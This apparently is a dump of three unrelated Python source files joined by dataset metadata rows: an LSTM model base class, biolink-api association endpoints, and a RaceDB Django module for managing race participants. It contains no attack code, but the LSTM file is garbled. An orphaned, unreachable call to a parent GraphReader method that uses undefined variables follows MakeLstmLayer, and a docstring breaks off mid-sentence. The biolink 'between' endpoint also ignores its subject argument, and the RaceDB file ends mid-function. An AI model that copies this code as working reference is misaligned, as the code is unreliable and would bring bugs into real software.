# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module defines the abstract base class for LSTM models."""
import io
import pathlib
import tempfile
from typing import Any
from typing import Callable
from typing import Iterable
from typing import List
from typing import Optional
from deeplearning.ml4pl.graphs.labelled import graph_database_reader
from deeplearning.ml4pl.graphs.labelled import graph_tuple_database
from deeplearning.ml4pl.models import batch as batches
from deeplearning.ml4pl.models import classifier_base
from deeplearning.ml4pl.models import epoch
from deeplearning.ml4pl.models.lstm import lstm_utils as utils
from deeplearning.ml4pl.seq import graph2seq
from labm8.py import app
from labm8.py import humanize
from labm8.py import progress
from third_party.py.tensorflow import tf
FLAGS = app.FLAGS
app.DEFINE_integer(
"lang_model_hidden_size",
64,
"The size of hidden layer(s) in the LSTM baselines.",
)
app.DEFINE_integer(
"heuristic_model_hidden_size", 32, "The size of the dense output layer."
)
app.DEFINE_integer(
"batch_size",
64,
"The number of padded sequences to concatenate into a batch.",
)
app.DEFINE_boolean(
"cudnn_lstm",
True,
"If set, use CuDNNLSTM implementation when a GPU is available. Else use "
"default Keras implementation. Note that the two implementations are "
"incompatible - a model saved using one LSTM type cannot be restored using "
"the other LSTM type.",
)
class LstmBase(classifier_base.ClassifierBase):
"""Abstract base class for LSTM models."""
def __init__(
self,
*args,
padded_sequence_length: Optional[int] = None,
graph2seq_encoder: Optional[graph2seq.EncoderBase] = None,
batch_size: Optional[int] = None,
**kwargs,
):
super(LstmBase, self).__init__(*args, **kwargs)
self.batch_size = batch_size or FLAGS.batch_size
# Determine the size of padded sequences. Use the requested
# padded_sequence_length, or the maximum encoded length if it is shorter.
self.padded_sequence_length = (
padded_sequence_length or FLAGS.padded_sequence_length
)
self.encoder = graph2seq_encoder or self.GetEncoder()
# After instantiating the encoder, see if we can reduce the padded sequence
# length.
self.padded_sequence_length = min(
self.padded_sequence_length, self.encoder.max_encoded_length
)
# Reset any previous Tensorflow session. This is required when running
# consecutive LSTM models in the same process.
tf.compat.v1.keras.backend.clear_session()
# Set by Initialize() and LoadModelData().
self.session = None
self.graph = None
def MakeLstmLayer(self, *args, **kwargs):
"""Construct an LSTM layer.
If a GPU is available and --cudnn_lstm, this will use NVIDIA's fast
CuDNNLSTM implementation. Else it will use Keras' builtin LSTM, which is
much slower but works on CPU.
"""
if self.gpu and FLAGS.cudnn_lstm and tf.compat.v1.test.is_gpu_available():
return tf.compat.v1.keras.layers.CuDNNLSTM(*args, **kwargs)
else:
return tf.compat.v1.keras.layers.LSTM(*args, **kwargs, implementation=1)
return super(LstmBase, self).GraphReader(
epoch_type=epoch_type,
graph_db=graph_db,
filters=filters,
limit=limit,
ctx=ctx,
)
def CreateModelData(self) -> None:
"""Initialize an LSTM model. This """
# Create the Tensorflow session and graph for the model.
self.session = utils.SetAllowedGrowthOnKerasSession()
self.graph = tf.compat.v1.get_default_graph()
# To enable thread-safe use of a Keras model we must make sure to fix the
# graph and session whenever we are going to use self.model.
with self.graph.as_default():
tf.compat.v1.keras.backend.set_session(self.session)
self.model = self.CreateKerasModel()
self.FinalizeKerasModel()
def FinalizeKerasModel(self) -> None:
"""Finalize a newly instantiated keras model.
To enable thread-safe use of the Keras model we must ensure that the
computation graph is fully instantiated from the master thread before the
first call to RunBatch(). Keras lazily instantiates parts of the graph
which we can force by performing the necessary ops now:
* training ops: make sure those are created by running the training loop
on a small batch of data.
* save/restore ops: make sure those are created by running save_model()
and throwing away the generated file.
Once we have performed those actions, we can freeze the computation graph
to make explicit the fact that later operations are not permitted to modify
the graph.
"""
with self.graph.as_default():
tf.compat.v1.keras.backend.set_session(self.session)
# To enable thread-safe use of the Keras model we must ensure that
# the computation graph is fully instantiated before the first call
# to RunBatch(). Keras lazily instantiates parts of the graph (such as
# training ops), so make sure those are created by running the training
# loop now on a single graph.
reader = graph_database_reader.BufferedGraphReader(
self.graph_db, limit=self.warm_up_batch_size
)
batch = self.MakeBatch(epoch.Type.TRAIN, reader)
assert batch.graph_count == self.warm_up_batch_size
self.RunBatch(epoch.Type.TRAIN, batch)
# Run private model methods that instantiate graph components.
# See: https://stackoverflow.com/a/46801607
self.model._make_predict_function()
self.model._make_test_function()
self.model._make_train_function()
# Saving the graph also creates new ops, so run it now.
with tempfile.TemporaryDirectory(prefix="ml4pl_lstm_") as d:
self.model.save(pathlib.Path(d) / "delete_md.h5")
# Finally we have instantiated the graph, so freeze it to mane any
# implicit modification raise an error.
self.graph.finalize()
@property
def warm_up_batch_size(self) -> int:
"""Get the size of the batch used for warm-up runs of the LSTM model."""
return 1
def GetEncoder(self) -> graph2seq.EncoderBase:
"""Construct the graph encoder."""
raise NotImplementedError("abstract class")
def Summary(self) -> str:
"""Get a summary"""
buf = io.StringIO()
self.model.summary(print_fn=lambda msg: print(msg, file=buf))
print(
"Using padded sequence length "
f"{humanize.DecimalPrefix(self.padded_sequence_length, '')} from maximum "
f"{humanize.DecimalPrefix(self.encoder.max_encoded_length, '')} "
f"(max {(1 - (self.padded_sequence_length / self.encoder.max_encoded_length)):.3%} "
"sequence truncation)",
file=buf,
)
return buf.getvalue()
@property
def padded_vocabulary_size(self) -> int:
return self.encoder.vocabulary_size + 1
@property
def padding_element(self) -> int:
return self.encoder.vocabulary_size
def GetBatchOfGraphs(
self, graph_iterator: Iterable[graph_tuple_database.GraphTuple]
) -> List[graph_tuple_database.GraphTuple]:
"""Read a list of <= batch_size graphs from a graph_iterator."""
# Peel off a batch of graphs to process.
graphs: List[graph_tuple_database.GraphTuple] = []
while len(graphs) < self.batch_size:
try:
graph = next(graph_iterator)
except StopIteration:
# We have run out of graphs.
break
graphs.append(graph)
return graphs
def GetModelData(self) -> Any:
"""Get the model state."""
# According to https://keras.io/getting-started/faq/, it is not recommended
# to pickle a Keras model. So as a workaround, I use Keras's saving
# mechanism to store the weights, and pickle that.
with tempfile.TemporaryDirectory(prefix="lstm_pickle_") as d:
path = pathlib.Path(d) / "weights.h5"
with self.graph.as_default():
tf.compat.v1.keras.backend.set_session(self.session)
self.model.save(path)
with open(path, "rb") as f:
model_data = f.read()
return model_data
def LoadModelData(self, data_to_load: Any) -> None:
"""Restore the model state."""
# Load the weights from a file generated by ModelDataToSave().
with tempfile.TemporaryDirectory(prefix="lstm_pickle_") as d:
path = pathlib.Path(d) / "weights.h5"
with open(path, "wb") as f:
f.write(data_to_load)
# The default TF graph is finalized in Initialize(), so we must
# first reset the session and create a new graph.
if self.session:
self.session.close()
tf.compat.v1.reset_default_graph()
self.session = utils.SetAllowedGrowthOnKerasSession()
self.graph = tf.compat.v1.get_default_graph()
with self.graph.as_default():
tf.compat.v1.keras.backend.set_session(self.session)
self.model = tf.compat.v1.keras.models.load_model(path)
self.FinalizeKerasModel()
def CreateKerasModel(self) -> tf.compat.v1.keras.Model:
"""Create the LSTM model."""
raise NotImplementedError("abstract class")
def RunBatch(
self,
epoch_type: epoch.Type,
batch: batches.Data,
ctx: progress.ProgressContext = progress.NullContext,
) -> batches.Results:
"""Run a batch of data through the model.
Args:
epoch_type: The type of the current epoch.
batch: A batch of graphs and model data. This requires that batch data has
'x' and 'y' properties that return lists of model inputs, a `targets`
property that returns a flattened list of targets, a `GetPredictions()`
method that recieves as input the data generated by model and returns
a flattened array of the same shape as `targets`.
ctx: A logging context.
"""
# We can only get the loss on training.
loss = None
with self.graph.as_default():
tf.compat.v1.keras.backend.set_session(self.session)
if epoch_type == epoch.Type.TRAIN:
loss, *_ = self.model.train_on_batch(batch.data.x, batch.data.y)
predictions = self.model.predict_on_batch(batch.data.x)
return batches.Results.Create(
targets=batch.data.targets,
predictions=batch.data.GetPredictions(predictions, ctx=ctx),
loss=loss,
)
| [
"[email protected]"
] | |
be166e9147de70c62d3f58a25394cfa3dbf8ba87 | 6469e5689c5888481a5eb1c2d37e057c42e2afc3 | /biolink/api/link/endpoints/associations_from.py | 068338308ebe6c4ba78cebb9d5f045be2ad9c4f7 | [] | no_license | othreecodes/biolink-api | 66e2b171da0f112f124c5adc8bf2a3a23d78ce1a | 37761acba24ff5045fb65b16b009fdaa0fafa03e | refs/heads/master | 2021-05-09T00:34:32.199397 | 2018-01-31T22:10:08 | 2018-01-31T22:10:08 | 119,743,095 | 2 | 0 | null | 2018-01-31T21:03:53 | 2018-01-31T21:03:52 | null | UTF-8 | Python | false | false | 3,655 | py | import logging
from flask import request
from flask_restplus import Resource
from biolink.datamodel.serializers import association, association_results
from biolink.api.restplus import api
from ontobio.golr.golr_associations import get_association, search_associations
import pysolr
log = logging.getLogger(__name__)
ns = api.namespace('association', description='Retrieve associations between entities')
parser = api.parser()
parser.add_argument('subject_taxon', help='SUBJECT TAXON id, e.g. NCBITaxon:9606. Includes inferences by default (higher level taxa can be used)')
parser.add_argument('evidence', help="""Object id, e.g. ECO:0000501 (for IEA; Includes inferred by default)
or a specific publication or other supporting ibject, e.g. ZFIN:ZDB-PUB-060503-2.
""")
parser.add_argument('graphize', type=bool, help='If set, includes graph object in response')
parser.add_argument('fl_excludes_evidence', type=bool, help='If set, excludes evidence objects in response')
parser.add_argument('page', type=int, required=False, default=1, help='Return results starting with this row number')
parser.add_argument('rows', type=int, required=False, default=10, help='limit on number of rows')
parser.add_argument('map_identifiers', help='Prefix to map all IDs to. E.g. NCBIGene, HP, OMIM, DOID')
parser.add_argument('subject_category', help='e.g. gene, genotype, disease, function (todo: use enum)')
parser.add_argument('object_category', help='e.g. disease, phenotype, gene')
parser.add_argument('slim', action='append', help='Map objects up (slim) to a higher level category. Value can be ontology class ID or subset ID')
parser.add_argument('use_compact_associations', type=bool, help='If true, returns results in compact associations format')
@ns.route('/from/<subject>')
@api.doc(params={'subject': 'Return associations emanating from this node, e.g. specifying NCBIGene:84570 will return gene-phenotype, gene-function etc for this gene'})
class AssociationsFrom(Resource):
@api.expect(parser)
@api.marshal_list_with(association_results)
def get(self, subject):
"""
Returns list of matching associations starting from a given subject (source)
"""
args = parser.parse_args()
return search_associations(subject=subject, **args)
@ns.route('/to/<object>')
@api.doc(params={'object': 'Return associations pointing to this node. E.g. specifying MP:0013765 will return all genes, variants, strains etc annotated with this term. Can also be a biological entity such as a gene'})
class AssociationsTo(Resource):
@api.expect(parser)
@api.marshal_list_with(association_results)
def get(self, object):
"""
Returns list of matching associations pointing to a given object (target)
"""
args = parser.parse_args()
return search_associations(object=object, **args)
@ns.route('/between/<subject>/<object>')
@api.doc(params={'subject': 'E.g. e.g. MGI:1342287'})
@api.doc(params={'object': 'E.g. e.g. MP:0013765, can also be a biological entity such as a gene'})
class AssociationsBetween(Resource):
@api.expect(parser)
@api.marshal_list_with(association_results)
def get(self, subject, object):
"""
Returns associations connecting two entities
Given two entities (e.g. a particular gene and a particular disease), if these two entities
are connected (directly or indirectly), then return the association objects describing
the connection.
"""
args = parser.parse_args()
return search_associations(object=object, **args)
| [
"[email protected]"
] | |
92f8fb6e5871b18adc000d139f6b985917318f5a | 89afb47648305068fa7ca75164052da20c7c7eb4 | /core/participant.py | 3f2f4852cd44bae79844df23cdf6c20c329d3133 | [] | no_license | cclague/RaceDB | a0bc21c750049a0bf0d2f79fc1e9f88c60775b01 | e760138436d1f9ee0745bf58e10b68ebc99dc8a9 | refs/heads/master | 2023-01-30T12:49:34.707725 | 2020-12-08T21:37:28 | 2020-12-08T21:37:28 | 319,435,453 | 0 | 0 | null | 2020-12-08T21:37:29 | 2020-12-07T20:24:27 | null | UTF-8 | Python | false | false | 73,673 | py | import uuid
from subprocess import Popen, PIPE
import traceback
import operator
from django.utils.translation import ugettext_lazy as _
from django.utils.safestring import mark_safe
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from .views_common import *
from .views import BarcodeScanForm, RfidScanForm
from .get_id import get_id
from .CountryIOC import ioc_country
from .print_bib import print_bib_tag_label, print_id_label, print_body_bib, print_shoulder_bib
from .participant_key_filter import participant_key_filter, participant_bib_filter
from .get_participant_excel import get_participant_excel
from .emails import show_emails
from .gs_cmd import gs_cmd
from .ReadWriteTag import ReadTag, WriteTag
def get_participant( participantId ):
participant = get_object_or_404( Participant, pk=participantId )
return participant.enforce_tag_constraints()
@autostrip
class ParticipantSearchForm( Form ):
scan = forms.CharField( required=False, label = _('Scan Search'), help_text=_('Searches License and RFID Tag only') )
event = forms.ChoiceField( required=False, label = _('Event'), help_text=_('For faster response, review one Event at a time') )
name_text = forms.CharField( required=False, label = _('Name') )
gender = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('Men')), (1, _('Women'))), initial = 2 )
category = forms.ChoiceField( required=False, label = _('Category') )
bib = forms.IntegerField( required=False, min_value = -1 , label=_('Bib (-1 for Missing Bib)') )
rfid_text = forms.CharField( required=False, label = _('RFIDTag (-1 for Missing)') )
eligible = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('No')), (1, _('Yes'))), label = _('Eligible') )
paid = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('No')), (1, _('Yes'))), label = _('Paid') )
confirmed = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('No')), (1, _('Yes'))), label = _('Confirmed') )
team_text = forms.CharField( required=False, label = _('Team (-1 for Independent)') )
role_type = forms.ChoiceField( required=False, label = _('Role Type') )
city_text = forms.CharField( required=False, label = _('City') )
state_prov_text = forms.CharField( required=False, label = _('State/Prov') )
nationality_text = forms.CharField( required=False, label = _('Nationality') )
complete = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('No')), (1, _('Yes'))), label = _('Complete') )
has_events = forms.ChoiceField( required=False, choices = ((2, '----'), (0, _('None')), (1, _('Some'))), label = _('Has Events') )
def __init__(self, *args, **kwargs):
competition = kwargs.pop( 'competition', None )
super(ParticipantSearchForm, self).__init__(*args, **kwargs)
if competition:
self.fields['category'].choices = \
[(-1, '----')] + [(-2, _('*** Missing ***'))] + [(category.id, category.code_gender) for category in competition.get_categories()]
events = sorted( competition.get_events(), key = operator.attrgetter('date_time') )
self.fields['event'].choices = \
[(u'-1.0', _('All'))] + [(u'{}.{}'.format(event.event_type, event.id), u'{} {}'.format(event.short_name, timezone.localtime(event.date_time).strftime('%Y-%m-%d %H:%M:%S'))) for event in events]
roleChoices = [(i, role) for i, role in enumerate(Participant.ROLE_NAMES)]
roleChoices[0] = (0, '----')
self.fields['role_type'].choices = roleChoices
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = 'form-inline search'
button_args = [
Submit( 'search-submit', _('Search'), css_class = 'btn btn-primary' ),
Submit( 'clear-submit', _('Clear Search'), css_class = 'btn btn-primary' ),
CancelButton( _('OK'), css_class='btn btn-primary' ),
Submit( 'emails-submit', _('Emails'), css_class = 'btn btn-primary' ),
Submit( 'export-excel-submit', _('Export to Excel'), css_class = 'btn btn-primary' ),
]
self.helper.layout = Layout(
Row( Field('scan', size=20, autofocus=True ), HTML(' '*8), Field('event'),),
Row( *(
[Field('name_text'), Field('gender'), Field('category'), Field('bib'),] +
([Field('rfid_text'),] if competition and competition.using_tags else []) +
[Field('eligible'), Field('paid'), Field('confirmed'), Field('team_text'), Field('role_type'),] +
[Field('city_text'), Field('state_prov_text'), Field('nationality_text'), ] +
[Field('complete'), Field('has_events'), ]
)
),
Row( *(button_args[:-2] + [HTML(' '*8)] + button_args[-2:]) ),
)
@access_validation()
def Participants( request, competitionId ):
ParticipantsPerPage = 25
competition = get_object_or_404( Competition, pk=competitionId )
pfKey = 'participant_filter_{}'.format( competitionId )
pageKey = 'participant_filter_page_{}'.format( competitionId )
participant_filter = request.session.get(pfKey, {})
def getPaginator( participants ):
paginator = Paginator( participants, ParticipantsPerPage )
page = request.GET.get('page',None) or request.session.get(pageKey,None)
try:
participants = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
page = 1
participants = paginator.page(page)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
page = paginator.num_pages
participants = paginator.page(page)
request.session[pageKey] = page
return participants, paginator
if request.method == 'POST':
if 'clear-submit' in request.POST:
request.session[pfKey] = {}
request.session[pageKey] = None
return HttpResponseRedirect(getContext(request,'path'))
form = ParticipantSearchForm( request.POST, competition=competition )
if form.is_valid():
participant_filter = form.cleaned_data
request.session[pfKey] = participant_filter
request.session[pageKey] = None
else:
form = ParticipantSearchForm( competition = competition, initial = participant_filter )
#-------------------------------------------------------------------
event = None
try:
event_type, event_pk = [int(v) for v in participant_filter.get('event', '-1.0').split('.')]
except:
event_type, event_pk = None, None
if event_type == 0:
event = competition.eventmassstart_set.filter(pk=event_pk).first()
elif event_type == 1:
event = competition.eventtt_set.filter(pk=event_pk).first()
participants = event.get_participants() if event else competition.participant_set.all()
competitors = participants.filter( role=Participant.Competitor )
missing_category_count = competitors.filter( category__isnull=True ).count()
missing_bib_count = competitors.filter( bib__isnull=True ).count()
if competition.using_tags:
if competition.do_tag_validation:
# Show checked tags.
bad_tag_query = Q(tag_checked=False)
else:
# Show empty tags.
if competition.use_existing_tags:
bad_tag_query = Q(license_holder__existing_tag__isnull=True) | Q(license_holder__existing_tag=u'')
else:
bad_tag_query = Q(tag__isnull=True) | Q(tag=u'')
else:
bad_tag_query = Q()
bad_tag_count = competitors.filter( bad_tag_query ).count() if competition.using_tags else 0
if participant_filter.get('scan',0):
name_text = utils.normalizeSearch( participant_filter['scan'] )
names = name_text.split()
if names:
q = Q()
for n in names:
q |= Q(license_holder__search_text__contains = n)
participants = participants.filter( q ).select_related('team', 'license_holder')
participants, paginator = getPaginator( participants )
return render( request, 'participant_list.html', locals() )
if participant_filter.get('bib',None) is not None:
bib = participant_filter['bib']
if bib <= 0:
participants = participants.filter( bib__isnull=True )
else:
participants = participants.filter( bib=bib )
role_type = int(participant_filter.get('role_type',0))
if role_type > 0:
participants = participants.filter( role__range=(100*role_type, 100*role_type+99) )
if 0 <= int(participant_filter.get('gender',-1)) <= 1:
participants = participants.filter( license_holder__gender=participant_filter['gender'])
category_id = int(participant_filter.get('category',-1))
if category_id > 0:
participants = participants.filter( category__id=category_id )
elif category_id == -2:
participants = participants.filter( category__isnull=True )
if 0 <= int(participant_filter.get('confirmed',-1)) <= 1:
participants = participants.filter( confirmed=bool(int(participant_filter['confirmed'])) )
if 0 <= int(participant_filter.get('paid',-1)) <= 1:
participants = participants.filter( paid=bool(int(participant_filter['paid'])) )
if 0 <= int(participant_filter.get('eligible',-1)) <= 1:
participants = participants.filter( license_holder__eligible=bool(int(participant_filter['eligible'])) )
participants = participants.select_related('team', 'license_holder')
object_checks = []
if participant_filter.get('name_text','').strip():
name_text = utils.normalizeSearch( participant_filter['name_text'] )
names = name_text.split()
if names:
for n in names:
participants = participants.filter( license_holder__search_text__contains=n )
def name_filter( p ):
lh_name = utils.removeDiacritic(p.license_holder.full_name()).lower()
return all(n in lh_name for n in names)
object_checks.append( name_filter )
# Create a search function so we get a closure for the search text in the iterator.
def search_license_holder( search_text, field ):
search_fields = utils.normalizeSearch( search_text ).split()
if search_fields:
object_checks.append( lambda p: utils.matchSearchFields(search_fields, getattr(p.license_holder, field)) )
for field in ('city', 'state_prov', 'nationality'):
search_field = field + '_text'
if participant_filter.get(search_field,'').strip():
search_license_holder(
participant_filter[search_field],
field
)
team_search = participant_filter.get('team_text','').strip()
if team_search:
if team_search == '-1' or Team.is_independent_name(team_search):
participants = participants.filter( team__isnull = True )
else:
participants = participants.filter( team__isnull = False )
q = Q()
for t in team_search.split():
q &= Q( team__search_text__contains=t )
participants = participants.filter( q )
if 0 <= int(participant_filter.get('complete',-1) or 0) <= 1:
complete = bool(int(participant_filter['complete']))
if complete:
participants = participants.filter( Participant.get_can_start_query(competition) )
else:
participants = participants.exclude( Participant.get_can_start_query(competition) )
object_checks.append( lambda p: bool(p.is_done) == complete )
if competition.using_tags and participant_filter.get('rfid_text',''):
rfid = participant_filter.get('rfid_text','').upper()
if rfid == u'-1':
participants = participants.filter( bad_tag_query )
else:
if competition.use_existing_tags:
participants = participants.filter( license_holder__existing_tag=rfid )
else:
participants = participants.filter( tag=rfid )
has_events = int(participant_filter.get('has_events',-1))
if has_events == 0:
participants = participants.filter( role = Participant.Competitor )
object_checks.append( lambda p: not p.has_any_events() )
elif has_events == 1:
object_checks.append( lambda p: p.has_any_events() )
if object_checks:
failed = [p for p in participants if not all(oc(p) for oc in object_checks)]
if failed:
participants = participants.exclude( pk__in=[p.pk for p in failed][:800] )
if request.method == 'POST':
if 'export-excel-submit' in request.POST:
xl = get_participant_excel( Q(pk__in=participants.values_list('pk',flat=True)) )
response = HttpResponse(xl, content_type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet")
response['Content-Disposition'] = 'attachment; filename=RaceDB-Participants-{}.xlsx'.format(
datetime.datetime.now().strftime('%Y-%m-%d-%H%M%S'),
)
return response
if 'emails-submit' in request.POST:
return show_emails( request, participants=participants )
participants, paginator = getPaginator( participants )
return render( request, 'participant_list.html', locals() )
#-----------------------------------------------------------------------
@access_validation()
def ParticipantsInEvents( request, competitionId ):
competition = get_object_or_404( Competition, pk=competitionId )
competition_events = sorted( competition.get_events(), key=operator.attrgetter('date_time') )
event_participants = { event:set(event.get_participants()) for event in competition_events }
participants = sorted( set.union(*[p for p in event_participants.values()]), key=lambda p: p.license_holder.search_text )
check_codes = {
'optional_selected': u"\u2611",
'optional_deselected': u"\u2610",
'default_selected': u"\u2713",
'unavailable': u"",
}
for participant in participants:
event_status = []
for event in competition_events:
if participant in event_participants[event]:
event_status.append( check_codes['optional_selected' if event.optional else 'default_selected'] )
elif event.optional:
event_status.append( check_codes['optional_deselected'] )
else:
event_status.append( check_codes['unavailable'] )
participant.event_status = event_status
return render( request, 'participants_in_events.html', locals() )
@autostrip
class BibScanForm( Form ):
bib = forms.IntegerField( required = False, label = _('Bib') )
def __init__(self, *args, **kwargs):
hide_cancel_button = kwargs.pop('hide_cancel_button', None)
super(BibScanForm, self).__init__(*args, **kwargs)
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = 'navbar-form navbar-left'
button_args = [
Submit( 'search-submit', _('Search'), css_class = 'btn btn-primary' ),
CancelButton(),
]
if hide_cancel_button:
button_args = button_args[:-1]
self.helper.layout = Layout(
Row(
Field('bib', size=10),
),
Row( *button_args ),
)
@access_validation()
def ParticipantBibAdd( request, competitionId ):
competition = get_object_or_404( Competition, pk=competitionId )
add_by_bib = True
if request.method == 'POST':
form = BibScanForm( request.POST, hide_cancel_button=True )
if form.is_valid():
bib = form.cleaned_data['bib']
if not bib:
return HttpResponseRedirect(getContext(request,'path'))
license_holders, participants = participant_bib_filter( competition, bib )
if len(participants) == 1 and len(license_holders) == 0:
return HttpResponseRedirect(pushUrl(request,'ParticipantEdit', participants[0].id))
if len(participants) == 0 and len(license_holders) == 1:
return HttpResponseRedirect(pushUrl(request,'LicenseHolderAddConfirm', competition.id, license_holders[0].id))
return render( request, 'participant_scan_error.html', locals() )
else:
form = BibScanForm( hide_cancel_button=True )
return render( request, 'participant_add_bib.html', locals() )
#-----------------------------------------------------------------------
@access_validation()
def ParticipantManualAdd( request, competitionId ):
competition = get_object_or_404( Competition, pk=competitionId )
search_text = request.session.get('participant_new_filter', '')
btns = [('new-submit', 'New License Holder', 'btn btn-success')]
add_by_manual = True
if request.method == 'POST':
if 'new-submit' in request.POST:
return HttpResponseRedirect( pushUrl(request,'ParticipantNotFound', competition.id) )
form = SearchForm( btns, request.POST, hide_cancel_button=True )
if form.is_valid():
search_text = form.cleaned_data['search_text']
request.session['participant_new_filter'] = search_text
else:
form = SearchForm( btns, initial = {'search_text': search_text}, hide_cancel_button=True )
search_text = utils.normalizeSearch( search_text )
q = Q( active = True )
for term in search_text.split():
q &= Q(search_text__contains = term)
license_holders = LicenseHolder.objects.filter(q).order_by('search_text')[:MaxReturn]
# Flag which license_holders are already entered in this competition.
license_holders_in_competition = set( p.license_holder.id
for p in Participant.objects.select_related('license_holder').filter(competition=competition) )
add_multiple_categories = request.user.is_superuser or SystemInfo.get_singleton().reg_allow_add_multiple_categories
return render( request, 'participant_add_list.html', locals() )
@access_validation()
def ParticipantAddToCompetition( request, competitionId, licenseHolderId ):
competition = get_object_or_404( Competition, pk=competitionId )
license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
participant = Participant( competition=competition, license_holder=license_holder, preregistered=False ).init_default_values().auto_confirm()
try:
# Fails if the license_holder is non-unique.
participant.save()
participant.add_to_default_optional_events()
except IntegrityError as e:
# Recover silently by going directly to edit screen with the existing participant.
participant = Participant.objects.filter( competition=competition, license_holder=license_holder ).first()
return HttpResponseRedirect('{}ParticipantEdit/{}/'.format(getContext(request,'pop2Url'), participant.id))
@access_validation()
def ParticipantAddToCompetitionDifferentCategory( request, competitionId, licenseHolderId ):
competition = get_object_or_404( Competition, pk=competitionId )
license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
participant = Participant.objects.filter( competition=competition, license_holder=license_holder, category__isnull=True ).first()
if participant:
return HttpResponseRedirect('{}ParticipantEdit/{}/'.format(getContext(request,'pop2Url'), participant.id))
participant = Participant.objects.filter( competition=competition, license_holder=license_holder ).first()
if participant:
participant.id = None
participant.category = None
participant.role = Participant.Competitor
participant.bib = None
participant.save()
return HttpResponseRedirect('{}ParticipantEdit/{}/'.format(getContext(request,'pop2Url'), participant.id))
return ParticipantAddToCompetition( request, competitionId, licenseHolderId )
@access_validation()
def ParticipantAddToCompetitionDifferentCategoryConfirm( request, competitionId, licenseHolderId ):
competition = get_object_or_404( Competition, pk=competitionId )
license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
competition_age = competition.competition_age( license_holder )
participant = Participant.objects.filter( competition=competition, license_holder=license_holder, category__isnull=True ).first()
if participant:
return HttpResponseRedirect('{}ParticipantEdit/{}/'.format(getContext(request,'pop2Url'), participant.id))
return render( request, 'participant_add_to_category_confirm.html', locals() )
@access_validation()
def ParticipantEdit( request, participantId ):
try:
participant = Participant.objects.get( pk=participantId )
except:
return HttpResponseRedirect(getContext(request,'cancelUrl'))
competition = participant.competition
participant.enforce_tag_constraints()
system_info = SystemInfo.get_singleton()
add_multiple_categories = request.user.is_superuser or SystemInfo.get_singleton().reg_allow_add_multiple_categories
competition_age = competition.competition_age( participant.license_holder )
is_suspicious_age = not (5 <= competition_age <= 95)
is_license_checked = participant.is_license_checked()
is_license_check_required = participant.is_license_check_required()
tag_ok = request.user.is_superuser or not competition.using_tags or not competition.do_tag_validation or participant.tag_checked
#tag_ok = not competition.using_tags or not competition.do_tag_validation or participant.tag_checked
isEdit = True
rfid_antenna = int(request.session.get('rfid_antenna', 0))
return render( request, 'participant_form.html', locals() )
@access_validation()
def ParticipantEditFromLicenseHolder( request, competitionId, licenseHolderId ):
competition = get_object_or_404( Competition, pk=competitionId )
license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
participant = Participant.objects.filter(competition=competition, license_holder=license_holder).first()
if not participant:
return ParticipantAddToCompetition( request, competitionId, licenseHolderId )
participant.enforce_tag_constraints()
return ParticipantEdit( request, participant.id )
@access_validation()
def ParticipantRemove( request, participantId ):
participant = get_participant( participantId )
participant.enforce_tag_constraints()
add_multiple_categories = request.user.is_superuser or SystemInfo.get_singleton().reg_allow_add_multiple_categories
competition_age = participant.competition.competition_age( participant.license_holder )
is_suspicious_age = not (8 <= competition_age <= 90)
isEdit = False
return render( request, 'participant_form.html', locals() )
@access_validation()
def ParticipantDoDelete( request, participantId ):
participant = get_participant( participantId )
participant.delete()
return HttpResponseRedirect( getContext(request,'cancelUrl') )
def get_temp_print_filename( request, bib, ftype ):
port = request.META['SERVER_PORT']
rfid_antenna = int(request.session.get('rfid_antenna',0))
major_delimiter = '_'
minor_delimiter = '-'
return os.path.join(
os.path.dirname(os.path.dirname(os.path.realpath(__file__))),
'pdfs',
'{}{}{}'.format(
major_delimiter.join( '{}{}{}'.format(attr, minor_delimiter, value)
for attr, value in (('bib',bib), ('port',port), ('antenna',rfid_antenna), ('type',ftype)) ),
major_delimiter, uuid.uuid4().hex
)
) + '.pdf'
def get_cmd( cmd ):
if cmd.strip().startswith('$gswin'):
return cmd.replace('$gswin', gs_cmd() or 'gs_not_found', 1)
return cmd
def print_pdf( request, participant, pdf_str, print_type ):
system_info = SystemInfo.get_singleton()
if system_info.print_tag_option == SystemInfo.SERVER_PRINT_TAG:
try:
tmp_file = get_temp_print_filename( request, participant.bib, print_type )
with open(tmp_file, 'wb') as f:
f.write( pdf_str )
p = Popen(
get_cmd(system_info.server_print_tag_cmd).replace('$1', tmp_file), shell=True, bufsize=-1,
stdin=PIPE, stdout=PIPE, stderr=PIPE,
)
stdout_info, stderr_info = p.communicate( pdf_str )
returncode = p.returncode
except Exception as e:
stdout_info, stderr_info = '', e
returncode = None
try:
os.remove( tmp_file )
except:
pass
title = _("Print Status")
return render( request, 'cmd_response.html', locals() )
elif system_info.print_tag_option == SystemInfo.CLIENT_PRINT_TAG:
response = HttpResponse(pdf_str, content_type="application/pdf")
response['Content-Disposition'] = 'inline'
return response
else:
return HttpResponseRedirect( getContext(request,'cancelUrl') )
@access_validation()
def ParticipantPrintBodyBib( request, participantId, copies=2, onePage=False ):
participant = get_participant( participantId )
return print_pdf( request, participant, print_body_bib(participant, copies, onePage), 'Body' )
@access_validation()
def ParticipantPrintBibLabels( request, participantId ):
participant = get_participant( participantId )
return print_pdf( request, participant, print_bib_tag_label(participant), 'Frame' )
@access_validation()
def ParticipantPrintBibLabel1( request, participantId ):
participant = get_participant( participantId )
return print_pdf( request, participant, print_bib_tag_label(participant, right_page=False), 'Frame' )
@access_validation()
def ParticipantPrintShoulderBib( request, participantId ):
participant = get_participant( participantId )
